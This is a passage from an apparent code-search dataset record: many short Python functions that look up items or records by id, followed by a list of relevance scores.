no_html=no_html)\n return item", "def get_by_id(cls, item_id):\n return db_session.query(cls).filter(cls.id == item_id).first()", "def item_retrieve(id):\n item = getItem(id)\n if item is None:\n return jsonify({}), 204\n else:\n return jsonify(item=item.serialize)", "def item(self, item_id):\n response = self._request(V2_ENDPOINTS['ITEMS'] + item_id)\n return response", "def find_item_by_id(self, item_id: str) -> ClientWorklistItem:\n # print(f'Finding item with id {item_id}')\n self.update_worklist()\n # print(self.__items)\n for item in self.__items:\n if item.id == item_id:\n # print('Found')\n return item\n return None", "def get_item(self, usage_key, depth=0):\r\n store = self._get_modulestore_for_courseid(usage_key.course_key)\r\n return store.get_item(usage_key, depth)", "def get_by_id(self, id: int):\n\n\t\traise NotImplemented", "def _get(self, 
table, _id):\n data = {\"Key\": _id}\n return self._response_handler(table, \"get_item\", data)", "def read_item(\n *,\n db: Session = Depends(deps.get_db),\n id: int,\n current_user: models.User = Depends(deps.get_current_active_user),\n) -> Any:\n item = crud.item.get(db=db, id=id)\n if not item:\n raise HTTPException(status_code=404, detail='Item not found')\n if not crud.user.is_superuser(current_user) and (item.owner_id != current_user.id):\n raise HTTPException(status_code=400, detail='Not enough permissions')\n return item", "def get_item_with_id(self, uid):\n for item in self.get_items():\n if item.id == uid:\n return item\n\n return None", "def get_object(self, id_):\n return self._objects.get(id_, None)", "def get_item_by_id(request, pk):\n item = get_object_or_404(StockItem, pk=pk)\n res_dict = {\n 'id': item.id,\n 'name': item.name,\n 'count': item.count,\n 'date_added': item.date_added,\n 'exp': item.date_of_expiration,\n 'added_by': item.added_by,\n 'cat': str(item.fk_category),\n 'subcat': str(item.fk_subcategory),\n 'notes': item.notes\n }\n return JsonResponse(res_dict)", "def get_item_detail(item_id):\n pass", "def get_item(self, itemID, no_html=False, external_id=False, depth=1):\n data = self._client.Item.find(int(itemID))\n item = self.make_dict(data, no_html=no_html, external_id=external_id, depth=depth)\n return item", "def get(self, itemId):\n\n tableRow = self.__queryTableRow(itemId)\n return self.__getItemFromTableRow(tableRow)", "async def get(self):\n identifier = self.data[\"id\"]\n item = self.core.item_manager.items.get(identifier)\n if not item:\n return self.error(\n ERROR_ITEM_NOT_FOUND,\n f\"No item found with identifier {identifier}\", status_code=404)\n\n return self.json(data=list(item.actions.keys()))", "def get_item(self, usage_key, depth=0):\r\n try:\r\n return self.modules[usage_key.course_key][usage_key]\r\n except KeyError:\r\n raise ItemNotFoundError(usage_key)", "def find_by_id(object_id, items):\n for item in items:\n if object_id == item[\"id\"]:\n return item\n\n raise Exception(f\"Item with {object_id} not found\")", "def get_by_id(cls, id):\n e = api.get([key.Key(cls.__name__, id)])\n if e:\n return cls.from_entity(e[0])\n raise ObjectDoesNotExist", "def get(self, _id):", "def get_item(self, item_id):\n\n response = self._get_page_param('item', item_id).json()\n\n if not response:\n raise InvalidItemID\n\n return Item(response)", "def get_item(id):\n return jsonify(id=id, name='name', number=123)", "def get_by_id(cls, id):\n return cls.query().get(id)", "async def get_item(\n request: Request,\n response: Response,\n item_id: int,\n db: SAConnection = Depends(get_postgresql_connection)\n):\n cached_item = await request.app.extra['cache'].get_cache_item(item_id=item_id)\n if cached_item:\n return cached_item\n if db is None:\n response.status_code = 503\n return ResponseModel(result='Service unavailable')\n q = items.select().where(items.c.id == item_id)\n item = await db.fetchrow(query=q)\n if item is not None:\n item = Item(**item)\n await request.app.extra['cache'].set_cache_item(item=item)\n return item\n else:\n response.status_code = 404", "def get_item(self, id: str, user: User) -> Optional[T]:", "def get_by_id(self, id):\n return Entry.all().filter('entry_id = ', id).get()", "def get_object(id):", "def get_from_id(self,id=None):\n if id is None:\n return(self.items)\n if type(id) is int:\n for item in self.items:\n if item.id == id: return(item)\n items=[]\n if type(id) is list:\n return ([item.id for item in self.items if (item.id 
in id)])", "def find(cls, item_id):\n cls.logger.info(\"Processing lookup for shopcart item id %s ...\", item_id)\n return cls.query.get(item_id)", "def get(self, item_id: int):\n\n try:\n\n controller = self.controller()\n schema = self.schema()\n raw_data = controller.read(id=item_id)\n data = {'item': schema.dump(raw_data)}\n\n return ResponseHandler.render_response(data=data)\n\n except Exception as ex:\n\n return ResponseHandler.render_response(status=ERR, message=traceback.format_exc())", "def show(self, item_id):\n pass", "def __getitem__(self, id):\r\n \r\n if isinstance(id, basestring):\r\n return self._by_name[id]\r\n return self._by_number[id]", "def get(self, _id):\n if not self.root:\n raise RootNotSet\n node = self.id_map.get(_id)\n if not node:\n raise IDNotFound(_id)\n\n link = node.get('link')\n if link:\n link_node = self.id_map.get(_id)\n if not link_node:\n logger.error('link node not found!')\n raise IDNotFound(link_node)\n data = self.get(node['link'])\n data['link'] = data['id']\n data['id'] = link_node['id']\n return data\n\n if node.get('type') == 'group' or node.get('type') == None:\n return self._adapter._get_group(_id)\n elif node.get('type') == 'data':\n return self._adapter._load_data(_id)\n elif node.get('type') == 'json':\n return self._adapter._load_data(_id)\n elif node.get('type') == 'config':\n data = self._adapter._load_data(_id)\n data.pop('name', None)\n return data\n else:\n raise UnsupportedType", "def get(self, identifier, **kwargs):\n\n all_data = self._load()\n # if matches\n for feature in all_data['features']:\n if str(feature.get('id')) == identifier:\n return feature\n # default, no match\n err = f'item {identifier} not found'\n LOGGER.error(err)\n raise ProviderItemNotFoundError(err)", "def read_by_id(self, id, fields=None):\n assert id is not None, \"id can not be None\"\n return self.read_many_by_id([id], fields)[0]", "def get(self, id):\n return {'id': id}", "def item_record_by_id(session, record_id):\n d = session.get(api_url_base + '/items/{}'.format((record_id)),\n params=item_record_fields)\n r = ItemRecord(api_data=json.loads(d.text))\n return r", "def get(self, cls, id):\n pass", "def find_by_id(self, id_):\n return self.by_id.get(id_)", "def find_by_id(self, _id: int) -> tuple:\n item = self.model.find_by_id(_id)\n if item:\n return {'item': check_json(item)}, 200\n else:\n return {'error': {'message': 'Item not found'}}, 400", "def get_product_by_id(productId): # noqa: E501\n return 'do some magic!'", "async def read_maintenance_record_by_id(id: int, conn: Database = Depends(get_db)):\n\n item = await get(conn=conn, id=id)\n if not item:\n raise HTTPException(status_code=400, detail=\"Item not found\")\n return item", "def get_volume_from_id(item_id):\n return volumes[\"data\"][str(item_id)]", "def find_by_id(cls, iid: int):\n return cls.query.filter_by(id=iid).first()", "def get(cls, id):\n\n return cls.query.get(id)", "def get(cls, id):\n\n return cls.query.get(id)", "def read(self, id, attributes=None):\n return self._call('%s' % self._shopware_model + '/' + str(id),\n {'attributes' : attributes})", "def get(self, id):\n return self.__model__.query.get(id)", "def get_proof_item(self, id):\n return self.prf.find_item(id)", "def get_item(self, itemid: str, itemtypeid: str)->dict:\n self.__validate(itemid=itemid, itemtype=itemtypeid)\n url = build_uri_template('get_item').expand(type=itemtypeid, no=itemid)\n logger.info(\"Getting Item from: {}\".format(url))\n\n data = self._get_data(url)\n return data", "def get_object(self, id, 
**args):\n return self.request(\"{0}/{1}\".format(self.version, id), args)", "def test_find_stock_item_by_id(self):\n pass", "def find(self, id):\n response = self._connection.session.get(self.url + \"/%s\" % id)\n return self._raise_or_return_json(response)", "def get(self, item_name, item_id):\n item = {}\n try:\n item = self.glpi.get(item_name, item_id)\n except Exception as e:\n item = \"{ \\\"error_message\\\": \\\"%s\\\" }\" % e\n\n return item", "def get(self, id):\n pkg_key, component_key = id\n if pkg_key not in self.packages:\n raise Exception(\"Package not found while looking for id: %s \" % repr(id))\n p = self.packages[pkg_key]\n if component_key not in p.components:\n raise Exception(\"Component %s not found in package %s.\" % (component_key, pkg_key))\n return p.components[component_key]", "def jump_to_id(request, course_id, module_id):\r\n course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n items = modulestore().get_items(course_key, name=module_id)\r\n\r\n if len(items) == 0:\r\n raise Http404(\r\n u\"Could not find id: {0} in course_id: {1}. Referer: {2}\".format(\r\n module_id, course_id, request.META.get(\"HTTP_REFERER\", \"\")\r\n ))\r\n if len(items) > 1:\r\n log.warning(\r\n u\"Multiple items found with id: {0} in course_id: {1}. Referer: {2}. Using first: {3}\".format(\r\n module_id, course_id, request.META.get(\"HTTP_REFERER\", \"\"), items[0].location.to_deprecated_string()\r\n ))\r\n\r\n return jump_to(request, course_id, items[0].location.to_deprecated_string())", "def get_item_id(self, item_id):\n return self.driver.find_element_by_id(item_id)", "def get_module(self, name: str) -> ModuleInstance:\n return self.modules[name]", "def get(self, product_id):\n product = ProductModel.query.filter_by(id=product_id).first()\n if not product:\n product_api.abort(404, \"Product {} not found\".format(product_id))\n else:\n return product", "def get(self,id):\r\n person = get_one(id=id)\r\n if not person:\r\n api.abort(404)\r\n else:\r\n return person", "def get_by_id(c_id):\n return cr.get_by_id(c_id)", "def get_item(self, id):\n cmd = \"lpass show %s --json\" % id\n\n result = self.lpass(cmd)\n\n if result.return_code != 0:\n return self.handle_errors(result.output)\n\n data = json.loads(result.output)\n site = data[0]\n\n is_note = False\n\n if site[\"note\"] and not site[\"password\"]:\n is_note = True\n\n return {\n \"id\": site[\"id\"],\n \"name\": site[\"name\"] or \"\",\n \"url\": site[\"url\"] or \"\",\n \"username\": site[\"username\"] or \"\",\n \"password\": site[\"password\"] or \"\",\n \"note\": site[\"note\"],\n \"is_note\": is_note\n }", "def get(self, product_id):\n\n return product.get_single_product(product_id)", "def __get_uuid_by_id(self, id_: int) -> int:\n for module in self._modules:\n if module.id == id_:\n return module.uuid\n return None", "def get(self, product_id):\n return Products().get_one_product(product_id)", "def retrieve(self, kg_id):\n cursor = self.conn.cursor()\n cursor.execute(\"\"\"select * from items where kg_id = ?;\"\"\", (kg_id,))\n result = cursor.fetchone()\n if not result:\n raise PyragargaError(\"No item found.\")\n item = KGItem(*result)\n cursor.execute(\"\"\"select * from files where item_id = ?;\"\"\", (kg_id,))\n item.files = [unicode(x[1]) for x in cursor.fetchall()]\n # TODO: There must be a nicer way to do this\n item.genres = item.genres[2:-2].split(\"', '\")\n self.logger.info(\"Succesfully retrieved item %d\" % item.kg_id)\n return item", "def GetItem(self):\r\n \r\n return self._item", "def 
by_id(cls, id):\n\t\treturn DBSession.query(Power).filter(Power.power_id == id).first()", "def get_item_detail(self, identifier):\n\n try:\n return self.get_billing_item(identifier)\n except SoftLayerAPIError as exception:\n if exception.faultCode == 404:\n return self.get_billing_item_from_invoice(identifier)\n raise", "def get_item_by_index(self, index_name, id):\n results = self.table_connector.query(\n IndexName=index_name,\n KeyConditionExpression=Key(index_name).eq(id),\n )\n return results[\"Items\"] if \"Items\" in results else []", "def getByID(self, pid):\r\n i = self.pids.index(pid)\r\n return self.getByInd(i)", "def get_by_id(cls, id):\n return db.session.query(cls).get(id)", "def getItem(self, varID):\n for i in range(self.varList.count()):\n listItem = self.varList.item(i)\n if varID == listItem.getVariable().id:\n return listItem\n return None", "def get_item(\n self, id_: Union[UUID, str], full_dataset: bool = True\n ) -> Optional[DatasetItem]:\n items = list(\n self.search_items(\n dataset_ids=[id_], full_dataset=full_dataset, order=ItemSort.UNSORTED\n )\n )\n if not items:\n return None\n if len(items) > 1:\n raise RuntimeError(\n \"Something is wrong: Multiple dataset results for a single UUID\"\n )\n\n [item] = items\n return item", "def get(self, id):\n return self.__get_object(super(PullRequests, self).get(id))", "def findItem(self, id):\n itemFound = None\n for curItem in self.scene.items():\n if not isinstance(curItem, DiagramItem):\n continue \n if curItem.itemId == int(id):\n itemFound = curItem\n break\n return itemFound", "def get(self, item_id, class_id):\n return get_item_info_with_spell(item_id, class_id)", "def get():\n id_num = int(input('Enter the ID number of the item you wish to retrieve\\n'))\n db_actions.retrieve(id_num)", "def edit(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def read(id):\n db = core.connect()\n return db[id]", "def get_volume_by_id(self, id):\n for vol in self.conn.volumes:\n if vol.id == id:\n return vol\n raise KeyError(\"Volume with ID \" + id + \" not found\")", "def getRawItem(self, itemID):\n data = self._client.Item.find(int(itemID))\n return data", "def getbyid(self, id):\n\n return esd.retrieve(id)", "def get_gallery_item(id):\n try:\n # HACK: Problem is that send_request prints the error message\n # from Imgur when it encounters an error. This is nice because\n # this error message is more descriptive than just the status\n # code that Requests give. But since we first assume the id\n # belong to an image, it means we will get an error whenever\n # the id belongs to an album. The following code temporarily\n # disables stdout to avoid give a cryptic and incorrect error.\n\n # Code for disabling stdout is from\n # http://coreygoldberg.blogspot.dk/2009/05/\n # python-redirect-or-turn-off-stdout-and.html\n original_stdout = sys.stdout # keep a reference to STDOUT\n sys.stdout = NullDevice() # redirect the real STDOUT\n return self.get_gallery_image(id)\n # TODO: Add better error codes so I don't have to do a catch-all\n except Exception:\n return self.get_gallery_album(id)\n finally:\n sys.stdout = original_stdout # turn STDOUT back on" ]
[ "0.7972377", "0.7206379", "0.7024295", "0.6994273", "0.6911595", "0.6899674", "0.6879004", "0.6836557", "0.6800232", "0.6766554", "0.6753238", "0.6743982", "0.66724145", "0.66661835", "0.6653945", "0.6582316", "0.6534913", "0.6518929", "0.650722", "0.6454686", "0.63841563", "0.6343775", "0.63201", "0.6318316", "0.6308917", "0.62988806", "0.62357605", "0.62301403", "0.6230102", "0.61630243", "0.61562884", "0.61514664", "0.6147706", "0.6146195", "0.6111075", "0.61068666", "0.61005014", "0.60830015", "0.6069796", "0.6054057", "0.60441744", "0.60321534", "0.6012151", "0.59798867", "0.597956", "0.5958915", "0.59577847", "0.59274006", "0.59128183", "0.58965325", "0.58932", "0.58891493", "0.58890307", "0.5878563", "0.58708006", "0.5868585", "0.58527315", "0.58456683", "0.58448905", "0.5844669", "0.58340055", "0.58340055", "0.58281577", "0.58276963", "0.58268696", "0.58195287", "0.5816448", "0.58159214", "0.5814733", "0.58038586", "0.58034295", "0.57984096", "0.5778446", "0.5771661", "0.5769644", "0.5767102", "0.57664484", "0.5750323", "0.5748446", "0.57476425", "0.57430255", "0.57370865", "0.57260257", "0.57247597", "0.57106185", "0.5709172", "0.5704329", "0.57032096", "0.57012063", "0.5695448", "0.5694019", "0.569259", "0.56910783", "0.56858695", "0.5685362", "0.5668616", "0.5666987", "0.56502855", "0.5647196", "0.56417984" ]
0.6082355
38
List all of the items in this module.
def get_module_items(self, **kwargs): return PaginatedList( ModuleItem, self._requester, "GET", "courses/{}/modules/{}/items".format(self.course_id, self.id), {"course_id": self.course_id}, _kwargs=combine_kwargs(**kwargs), )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list_items(self):\n click.echo(\"ID --|-- Item Title\")\n for index, item in enumerate(self.items):\n click.echo(\" {} --|-- {}\".format(index, item.title))", "def get_all_items(self):\n return self.api.state['items']", "def all(self):\n return self.client.request_with_method(Methods.LIST % self.name)['items']", "def getAllItemsList():\n return Gw2Spidy._request('all-items', 'all')['results']", "def show_all(self):\n cmodules.showModuleData(\n Options.Author,\n Options.Name,\n Options.Call,\n Options.Category,\n Options.Type,\n Options.Version,\n Options.Description,\n Options.License,\n Options.Datecreation,\n Options.Lastmodified\n )\n self.show_commands()\n self.show_opt()", "def get_items(self):\n return self.item_list", "def show(self):\n return self.items", "def items(self) -> List:\n pass", "def get_items(self) -> list:\r\n return self._items", "def items():", "def get_items(self):\n return []", "def list(self):\n for item in self._config:\n item.list()", "def get_all(self):\n return self.__items", "def action_list(args):\n\n module_root = Path(\"modules/\")\n modules = load_modules(module_root)\n\n print(\"Available modules:\")\n for module in modules:\n print(f\"- {module}\")", "def items(self):", "def get_items(self):\n return self.items", "def list(self):", "def getAll(self):\n return self.__lst", "def getItems(self):\n for object in self.database:\n print(object)", "def items(self):\n return self.__items(())", "def items(self):\n return self._items", "def _list(self):\n raise NotImplementedError", "def list(self):\n return self._get_list()", "def allItems(self):\n items = []\n for itemType in self.__inventory__:\n for item in self.__inventory__[itemType]:\n items.append(item)\n return items", "def list(self):\n return self._list(self._path())", "def items(self) -> List[Item]:\n return self._items", "def display(self):\r\n\t\tfor each_item in self.items:\r\n\t\t\teach_item.display()", "def items(self):\n return list(self.items_generator())", "def print_items(self):\n for items in inventory:\n print(f\"- {items.upper()}\")", "def list(self):\n url = self._resource_name\n return self._get(url)", "def print_inventory(self):\r\n for item in self._inventory:\r\n print(item, '\\n')", "def print_list(self):\r\n pass", "def output_all_items(items):\n\n for item in items:\n print(item)", "def output_all_items(items):\n\n for item in items:\n print(item)", "def items(self):\n return [x.item for x in self]", "def list(self, *args):\n return []", "def displayable_items(self):\r\n return [self]", "def get_item_list(cls):\n if Item.__item_list is None:\n Item.__item_list = []\n return Item.__item_list", "def list(\n self,\n name,\n ):\n pass", "def getList(self):\n pass", "def list(self):\n return self.request(\"GET\")", "def do_list_items(self, arg):\n try:\n cprint (\"These are your items: \\n\", 'blue')\n my_items = arg[\"<all_items>\"]\n choice = arg[\"--choice\"]\n if choice == \"name\":\n my_items_str = \" \".join(my_items)\n print(my_items_str)\n elif choice == \"id\":\n my_items_str = int(\" \".join(my_items))\n print (my_items_str)\n app.ToDoApp.to_view_items(my_items_str)\n \n\n\n \n except ValueError as e:\n cprint((e), 'red')", "def get_module_info_list(self):\n self._get_module_info_list = pa_module_info_cb_t(self._module_info_cb)\n pa_context_get_module_info_list(self._context,\n self._get_module_info_list,\n None)", "def list(self) -> directory.Level.Listing:\n return self.Listing(self.tag.states)", "def list():", "def list():", "def getList(self):\n\treturn self.list", 
"def printall():\n print listAll()", "def get_items(self):\r\n return self.items()", "def getList(self):", "def getList(self):", "def get_items(self):\r\n item_list = []\r\n for item in self._inventory:\r\n item_list.append(item._name)\r\n return item_list", "def all_items_handler():\n items = getAllItems()\n return jsonify(items=[i.serialize for i in items])", "def all(cls):\n cls.logger.info(\"Processing all Shopcart Items\")\n return cls.query.order_by(cls.id).all()", "def getItemList(self):\r\n raise AbstractError\r\n return []", "def list(self):\n\n for name in self.projects:\n self.projects[name].show()\n print(\"\\n\")", "def get_items(self):\n return self.item_ids", "def list(self):\n return self.connection.get(self.service)", "def get_items():\n return requester.perform_request(Uri.items)", "def MODULES(self):\n pass", "def get_list(self):\n return self.__repository.get_all()", "def list():\n data = getInstaData()\n return render_template(\"list.html\", data=data)", "def _list_all(root_pkg, prog):\n res = \"\\n\".join(\n sorted(\n pkinspect.package_module_names(_import(root_pkg)),\n key=str.lower,\n ),\n )\n sys.stderr.write(f\"usage: {prog} module command [args...]\\nModules:\\n{res}\\n\")\n return 1", "def list(self):\n return [self.inUse, self.type, self.previousBlock, self.amount,\n self.blocks, self.nextBlock, self.items]", "def __call__(self):\n return self.get_items()", "def items(self, namespace):\n return ()", "def items(self) -> List[RadioStation]:\n return self._items", "def listing(self):\r\n listing = LinkListing(self.builder_obj, show_nums = self.show_nums)\r\n return listing.listing()", "def get_display_items(self):\r\n items = []\r\n for child in self.get_children():\r\n items.extend(child.displayable_items())\r\n\r\n return items", "def list(self):\n return self.objects.all()", "def items(self):\n\t\treturn self.config_parser.items(self.section_name)", "def getList(self):\n return self.list", "def getList(self):\n return self.list_", "async def list(self, *args, **kwargs):\n return f\"Command list: {', '.join(self.get_commands())}\"", "def items(self):\n return self.d.items()", "def items(self):\n return self.d.items()", "def get_items(self):\n return (item for item in self.items)", "def listModules(self):\n modules = [(module.name,\n module.queue,\n module.Active) for module in self.db.getModules()]\n return modules", "def items(self):\n return self._get_storage().items()", "def get_all(self):\n\n return self._items[:]", "def items(self):\n return self._as_dict().items()", "def print_items(items): \n print(items)", "def all_items(self) -> ItemGroup:\n return self.items + self.end_items", "def items(self):\r\n return self._as_dict().items()", "def return_items(self):\n cur = self.cursor\n cur.execute(f\"SELECT * FROM {self.product_name}\")\n products = cur.fetchall()\n return products", "def modules(self):\n return self._modules", "def items(self):\n return self._ctx.items()", "def print(self):\n print(\"Repository list: \")\n for repo in self.list:\n print(\"- \" + repo.name)", "def items(self):\n\n return ItemsView(self)", "def getAllItems(self):\n data = self._client.Item.filter(\n int(self.app_id), {\n 'limit': 500,\n# 'filters':[{\n# \"key\":\"96943879\", #En este pedazo se está filtrando sobre un campo, se quiere coger sólo a los\n# \"values\":[1],\n# }],\n },\n )[\"items\"]\n fields = [self.makeDict(item) for item in data]\n return fields", "def __repr__(self):\n return str(self.list_all())", "def items(self) -> List[InlineResponse200Items]:\n return 
self._items", "def print_all(self) -> None:\n\n print(\"title: \" + str(self.title))\n print(\"simple_title: \" + str(self.simple_title))\n print(\"info: \" + str(self.info))\n print(\"exists: \" + str(self.exists))\n print(\"categories: \" + str(self.categories))\n print(\"content: \" + str(self.content))", "def fill_item_list(self):\n return_list = []\n with Transaction().start(DBNAME, 1):\n self.productlist = self.Product.search([('description', '=', 'Stock'), ('type', '=', 'goods')])\n for i in self.productlist:\n return_list.append(i.template.name)\n return return_list", "def modules(self):\n return self._modules.keys()", "def items(self):\n return self._d.items()", "def list(self):\r\n return List(self)", "def list(self):\r\n return List(self)", "def list(self):\r\n return List(self)", "def get(self):\r\n return get_all()" ]
[ "0.7802198", "0.7336953", "0.7246295", "0.72275877", "0.72109777", "0.7051289", "0.70437056", "0.69722456", "0.6970122", "0.6892468", "0.6889149", "0.68333614", "0.68188065", "0.6816167", "0.6774345", "0.67634386", "0.6754438", "0.6714948", "0.6712662", "0.6659909", "0.6640903", "0.66251624", "0.6610916", "0.6562578", "0.6554867", "0.6554262", "0.65502965", "0.65140307", "0.64909637", "0.6486898", "0.6481435", "0.6470067", "0.64375126", "0.64375126", "0.642825", "0.64244145", "0.64214605", "0.6411049", "0.63991576", "0.6368218", "0.6359711", "0.635356", "0.6289381", "0.6282647", "0.6257555", "0.6257555", "0.6254339", "0.6250409", "0.62351966", "0.6234519", "0.6234519", "0.6232652", "0.6221857", "0.62004685", "0.6193009", "0.6188063", "0.61735976", "0.6158342", "0.6156667", "0.61541396", "0.614771", "0.6144253", "0.61409616", "0.61376786", "0.61315346", "0.61279494", "0.6127021", "0.6124703", "0.6100938", "0.6098679", "0.6091524", "0.6085824", "0.6082294", "0.60807055", "0.6065784", "0.6065784", "0.60589296", "0.6056197", "0.60471255", "0.6041517", "0.60412824", "0.60364217", "0.60245585", "0.6014401", "0.60111797", "0.6008404", "0.6007108", "0.60050344", "0.60020745", "0.5982931", "0.59787494", "0.5975093", "0.59727544", "0.5972399", "0.5959726", "0.59518015", "0.5948056", "0.5948056", "0.5948056", "0.5944547" ]
0.6004262
88
Reset module progressions to their default locked state and recalculate them based on the current requirements. Adding progression requirements to an active course will not lock students out of modules they have already unlocked unless this action is called.
def relock(self, **kwargs): response = self._requester.request( "PUT", "courses/{}/modules/{}/relock".format(self.course_id, self.id), _kwargs=combine_kwargs(**kwargs), ) module_json = response.json() module_json.update({"course_id": self.course_id}) return Module(self._requester, module_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def action_lock(self):\n self.state = 'locked'", "def _reset_module_attempts(studentmodule):\r\n # load the state json\r\n problem_state = json.loads(studentmodule.state)\r\n # old_number_of_attempts = problem_state[\"attempts\"]\r\n problem_state[\"attempts\"] = 0\r\n\r\n # save\r\n studentmodule.state = json.dumps(problem_state)\r\n studentmodule.save()", "def applyLock(self, pkmn):\n pkmn.actionLock = ActionLock(pkmn, \\\n pkmn.lastAction, self.turns-1)", "def set_status(self, locked=None, exclusive=None):\n self.locked = locked\n self.exclusive = exclusive", "def reset_attempts_module_state(xmodule_instance_args, _module_descriptor, student_module):\r\n update_status = UPDATE_STATUS_SKIPPED\r\n problem_state = json.loads(student_module.state) if student_module.state else {}\r\n if 'attempts' in problem_state:\r\n old_number_of_attempts = problem_state[\"attempts\"]\r\n if old_number_of_attempts > 0:\r\n problem_state[\"attempts\"] = 0\r\n # convert back to json and save\r\n student_module.state = json.dumps(problem_state)\r\n student_module.save()\r\n # get request-related tracking information from args passthrough,\r\n # and supplement with task-specific information:\r\n track_function = _get_track_function_for_task(student_module.student, xmodule_instance_args)\r\n event_info = {\"old_attempts\": old_number_of_attempts, \"new_attempts\": 0}\r\n track_function('problem_reset_attempts', event_info)\r\n update_status = UPDATE_STATUS_SUCCEEDED\r\n\r\n return update_status", "def reset(self, data):\r\n ugettext = self.system.service(self, \"i18n\").ugettext\r\n if self.state != self.DONE:\r\n if not self.ready_to_reset:\r\n return self.out_of_sync_error(data)\r\n success, can_reset, error = self.check_if_student_has_done_needed_grading()\r\n if not can_reset:\r\n return {'error': error, 'success': False}\r\n if self.student_attempts >= self.max_attempts - 1:\r\n if self.student_attempts == self.max_attempts - 1:\r\n self.student_attempts += 1\r\n return {\r\n 'success': False,\r\n # This is a student_facing_error\r\n 'error': ugettext(\r\n 'You have attempted this question {number_of_student_attempts} times. 
'\r\n 'You are only allowed to attempt it {max_number_of_attempts} times.'\r\n ).format(\r\n number_of_student_attempts=self.student_attempts,\r\n max_number_of_attempts=self.max_attempts\r\n )\r\n }\r\n self.student_attempts +=1\r\n self.state = self.INITIAL\r\n self.ready_to_reset = False\r\n for i in xrange(len(self.task_xml)):\r\n self.current_task_number = i\r\n self.setup_next_task(reset=True)\r\n self.current_task.reset(self.system)\r\n self.task_states[self.current_task_number] = self.current_task.get_instance_state()\r\n self.current_task_number = 0\r\n self.ready_to_reset = False\r\n\r\n self.setup_next_task()\r\n return {'success': True, 'html': self.get_html_nonsystem()}", "def reset(self):\n self._open_activity_count = 0\n self._decisions = []\n self._tasks = TaskRegistry()", "def reset_progress(self):\n self.state = \"\"", "def prepareFinishSlot(self):\r\n \r\n self.lockIndex = self._wizard.targetIndexes[0]\r\n self._targetRepositoryModel.lock([self.lockIndex])", "def reactivate(self):\n self.write({'active': True, 'state': 'running'})\n STAGE = self.env['anytracker.stage']\n for ticket in self:\n starts = STAGE.search([('method_id', '=', ticket.method_id.id),\n ('progress', '=', 0)])\n if len(starts) != 1:\n raise except_orm(\n _('Configuration error !'),\n _('One and only one stage should have a 0% progress'))\n # write stage in a separate line to recompute progress & risk\n ticket.write({'stage_id': starts[0].id})\n self.recompute_parents()", "def processLock(self):\r\n self.controller.executionLock()", "def _reset_block_validation_penalty(cls, context: 'IconScoreContext'):\n\n for prep in context.preps:\n if prep.penalty == PenaltyReason.BLOCK_VALIDATION and prep.status == PRepStatus.ACTIVE:\n dirty_prep = context.get_prep(prep.address, mutable=True)\n dirty_prep.reset_block_validation_penalty()\n context.put_dirty_prep(dirty_prep)\n\n context.update_dirty_prep_batch()", "def fix_locked_default_shader(progress_controller=None):\n if progress_controller is None:\n progress_controller = ProgressControllerBase()\n pm.lockNode(\"initialShadingGroup\", l=0, lockUnpublished=0)\n progress_controller.complete()", "def lock_table(self):\n\n self.status = 'Locked'", "def _stage1(self):\n self.start_progress()\n tasks = list(self._chain_dict(self._model.adjust_tasks))\n if len(tasks) == 0:\n self._stage2(self._no_adjustments_case())\n else:\n task = lambda : self._run_adjust_tasks(tasks)\n locator.get(\"pool\").submit(task, self._stage2)", "def _dummy_schedule(progress_remaining: float) -> float:\n del progress_remaining\n return 0.0", "def _module_toggled(self, module, required):\n\n self._set_implicit_requirements()\n\n if required:\n self.project.pyqt_modules.append(module)\n else:\n self.project.pyqt_modules.remove(module)\n\n self.project.modified = True", "def locked(self, locked):\n\n self._locked = locked", "def locked(self, locked):\n\n self._locked = locked", "def freeze(self,):\n if self.frozen: return\n\n self.id_lock.acquire()\n #Set logfile to None. 
Put current logfile into wait for chkpt state.\n self._rotatelog(None,\"\")\n self.loglocker.acquire_write()\n self.frozen = True", "def enable_freeze(self):\n n_t_t = 0\n n_l = 0\n if self.tree_ctrl_theory is not None:\n n_t_t = self.tree_ctrl_theory.GetCount()\n n_l = len(self.list_cb_theory)\n if (n_t_t + n_l > 0):\n self.bt_freeze.Enable()\n else:\n self.bt_freeze.Disable()", "def submit_reset_problem_attempts_for_all_students(request, usage_key): # pylint: disable=invalid-name\r\n # check arguments: make sure that the usage_key is defined\r\n # (since that's currently typed in). If the corresponding module descriptor doesn't exist,\r\n # an exception will be raised. Let it pass up to the caller.\r\n modulestore().get_item(usage_key)\r\n\r\n task_type = 'reset_problem_attempts'\r\n task_class = reset_problem_attempts\r\n task_input, task_key = encode_problem_and_student_input(usage_key)\r\n return submit_task(request, task_type, task_class, usage_key.course_key, task_input, task_key)", "def reset() -> None:\n Resources.total = dict(jobs=os.cpu_count() or 1)\n Resources.available = Resources.total.copy()\n Resources.default = dict(jobs=1)\n Resources.condition = asyncio.Condition()", "def requirements_fuse_counters(self) -> List[Counter[GriddedPerm]]:\n if self._requirements_fuse_counters is not None:\n return self._requirements_fuse_counters\n counters = [\n self._fuse_counter(req_list)\n for req_list in self._tiling.requirements\n if not self.is_positive_left_or_right_requirement(req_list)\n ]\n self._requirements_fuse_counters = counters\n return self._requirements_fuse_counters", "def reset_continued(self): \n self._recent_goal_continued = False\n self._update_action = False\n self._update_action_without_pause = False", "def mark_as_not_done(self):\n grade_event = {'value': 0, 'max_value': self.points}\n self.runtime.publish(self, 'grade', grade_event)", "def update_state(self, progress, policy_state=None):\n raise NotImplementedError", "def update_waiting(self):\n if self.get_value(0) is None:\n self.set_value(True, 0)\n else:\n self.set_value(not bool(self.get_value(0)), 0)\n self.state = ACTIVE", "def set_progress(self, progress: float):", "def f_lock(self):\n self._locked = True", "def reset_student_attempts(course_id, student, module_state_key, delete_module=False):\r\n # Reset the student's score in the submissions API\r\n # Currently this is used only by open assessment (ORA 2)\r\n # We need to do this *before* retrieving the `StudentModule` model,\r\n # because it's possible for a score to exist even if no student module exists.\r\n if delete_module:\r\n sub_api.reset_score(\r\n anonymous_id_for_user(student, course_id),\r\n course_id.to_deprecated_string(),\r\n module_state_key.to_deprecated_string(),\r\n )\r\n\r\n module_to_reset 